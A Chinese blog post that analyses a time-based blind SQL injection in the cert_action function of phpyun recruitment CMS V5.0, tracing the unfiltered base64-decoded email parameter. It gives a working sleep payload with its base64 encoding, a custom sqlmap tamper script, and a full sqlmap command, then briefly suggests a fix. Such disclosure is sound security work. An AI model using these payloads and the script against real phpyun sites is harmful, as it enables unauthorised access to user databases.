php100漏洞,phpyun人才管理系统V5.0 SQL注入漏洞分析

*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做*

cms背景介绍

PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。

漏洞类型

前台SQL盲注

漏洞描述

Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL延时注入。其未对 base64解密后的email参数进行任何过滤,从而导致漏洞产生。

漏洞产生链分析:

漏洞产生点位于 app\controller\qqconnect\index.class.php的cert_action函数

7666dd69b9965dfe1b1a9734e989e911.png

可以看到此函数开头将GET取得的结果经过base64_decode函数解码后分割引入 $arr数组中,此时可以绕过全局过滤,代表此处可以控制$arr[3]的值。再往下看:

0dc84b0c0c09dcd3ec5eeae7915866f1.png

此时可以看到,由于$arr[3]的值可控,所以导致$data的 email参数可控,并且引入upCertInfo函数的email参数可控。在跟进 upCertInfo函数:

7c9823eb9c0bbe7103a14a771618f454.png

可以看到在此函数中$data以及$whereData参数未经任何过滤又将其引入 upCertEmail函数,继续跟进:

a058963d40e57c7ae30bf2dc46a2d1d1.png

可以看到此函数同样未对data数组中的参数未经过任何过滤,此时$email变量可控并将其引入 getCertInfo函数中,继续跟进:

267bd5129c875c8199a9fb0a32a0b0f5.png可以看到又将可控数据引入 select_once函数中,此时$whereData中的check可控,继续跟进:

0f8462e09487355f2de62eb2be4a56a2.png

此函数中可以看到,将拥有可控数据的$where引入checkWhere 函数(篇幅问题,代码不贴了),其函数为判断是否有limit,orderby ,orderbyfield,groupby,having 等等,并将其参数修改为`email` = $email这种格式,并且还是未对其中参数做任何过滤。

现在基本确定存在SQL注入漏洞,此时只需本地复现即可。首先查看phpyun的路由调度。

cba961c90095912851432f00ecc1c07f.png

可以看到module名为$_GET[‘m’]的值,所以此处 m的值应该为 qqconnect

bcf848776c4b41aff4c175031a809046.png控制器为C ,函数为A。由于qqconnect模块下的控制器名为 index.class.php所以c为index 。由于函数名为cert_action,所以a为 cert。

漏洞利用条件

一、首先数据库phpyun_member表中必须有用户(可以自行注册,由于该系统是招聘系统,所以不存在无法注册的问题)

二、由于db.safety.php中对传入数据的限制,通过GET传入的数据最大为80个字符,并且还是经过base64加密的。所以payload应该只有56个字符左右的限制,有大佬的话可以尝试尝试更进一步的利用。

三、phpyun_company_cert表中必须有数据,否则SQL 注入无法成功。

漏洞本地复现

设置payload为:2|||‘or (if(true,sleep(5),1));#

将payload通过base64加密: Mnx8fCdvciAoaWYodHJ1ZSxzbGVlcCg1KSwxKSk7IyA=

69e3460c2b0904f117dd0d28d8bd27fc.png

可以看到响应时间为5082millis。约为5秒。 SQL注入复现成功。

使用SQLMAP进行注入

首先要使用SQLMAP进行注入验证需要编写SQLMAP脚本辅助。观察payload,发现要将sqlmap中测试需要的payload前面添加 2||| 。并且将添加数据后的payload进行base64编码。

编写脚本:phpyun.py

#!/usr/bin/env python

"""

Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)

See the file ‘LICENSE‘ for copying permission

"""

import base64

from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def dependencies():

pass

def tamper(payload, **kwargs):

""" phpyun payload

>>> tamper("1‘ AND SLEEP(5)#")

‘MScgQU5EIFNMRUVQKDUpIw==‘

"""

payload = "2|||"+payload    #给payload添加我们需要的数据

return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload    #对新payload进行加密

将此脚本放入tamper文件夹中便可使用。

SQLMAP命令 :python sqlmap.py -u "http://target.com/?m=qqconnect&c=index&a=cert&id=1" -p "id" --tamper="tamper/phpyun.py"  --technique T  -v 3  --dbms "mysql"  --risk 3

注:sqlmap参数必须设置 --risk 等级为3。由于风险等级默认为1,payload使用and逻辑判断,会导致sql注入检测失败。将风险等级设置为3时,payload会使用OR逻辑判断。所以此处必须设置。(风险等级为3的情况下,谨慎测试upload的SQL语句。)

13136e40debaa88969ea69fb3bbe0d3a.png

漏洞修复方案

建议对app\controller\qqconnect\index.class.php的cert_action 函数中的$arr[3]使用CheckRegEmail函数检测。具体修复方法等待官方补丁phpyun官方网站

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP人才系统(PHPYun)是专为中文用户设计和开发,程序源代码100%完全开放的一个采用PHP和MySQL数据库构建的高效的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。 PHPYUN人才招聘系统 5.0.1 Beta 更新日志:2020-07-03新增:好友助力;新增:网络招聘会;新增:身份切换控制开关;新增:PC端城市、职位搜索目录式伪静态;新增:职位描述样本;新增:聊天套餐;新增:店铺招聘按天收费;新增:手机端注册增加隐私政策等内容(针对最新政策文件);优化:CRM整体业务流程;优化:简历创建、职位创建相关选项;优化:城市、职位分类关键字自动匹配;优化:增值服务、赠送优惠券引导提醒;优化:手机端简历创建后下一步引导;优化:PC端会员中心职位管理;优化:前台简历搜索展示;优化:企业基本信息地图设置;优化:招聘会展示;优化:老版本手机端职位做301跳转;优化:OSS开启本地不再预存图片文件;优化:百聘职位默认60天结束期;优化:公告增加到期时间;优化:微信模板消息点击自动登录会员中心;优化:后台数据统计按当月时间统计(原始默认30天);修复:后台目录修改导致后台图片无法上传;修复:后台分配站点偶尔无法展示;修复:友情链接添加后不显示;修复:数据调用简历排序规则;修复:首页赏金职位链接错误;修复:企业环境展示排序;修复:后台营销邮件推广发送问题;修复:取消GIF类图片强制压缩;修复:激活企业身份,套餐查询错误;修复:分站域名信息配置不当导致无法进入后台;修复:企业导出下载简历姓名显示问题;修复:手机端快速投递简历 验证码提示问题;修复:简历创建教育完善度判断;修复:手机端附近职位大小写错误;修复:手机端急聘标志错位;修复:后台简历导入工作性质、到岗时间问题;修复:后台招聘会搜索企业错误;修复:快速投递简历未按照后台设置默认为未审核状态;修复:招聘会预留场地问题;修复:手机端分站SEO显示问题;修复:后台举报简历列表分页错误;修复:手机端置顶简历排序问题;修复:公众号内点击菜单浏览我的企业名称不显示;修复:IE11兼容性问题;修复:微信登录绑定失败;修复:专题报名问题;修复:广告添加优化;修复:邮箱认证失败;修复:海报小程序生成问题;修复:统计代码标签替换;修复:职位发布类型错误导致错误提示;修复:调整*号过滤符;修复:手机端资讯更多展示问题;修复:部分服务器环境导致图像裁剪失效;修复:积分转换的问题;修复:补充职位付费自动刷新;修复:后台数据统计相关问题;修复:PC端快速投递简历 弹出新窗口;修复:行为日志查询错误;修复:商城头像显示问题;修复:UC整合注册无法获取积分;修复:手机端未创建简历情况下显示问题;修复:聊天相关问题优化修复;修复:一些UI问题;修复:部分兼容性问题。 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值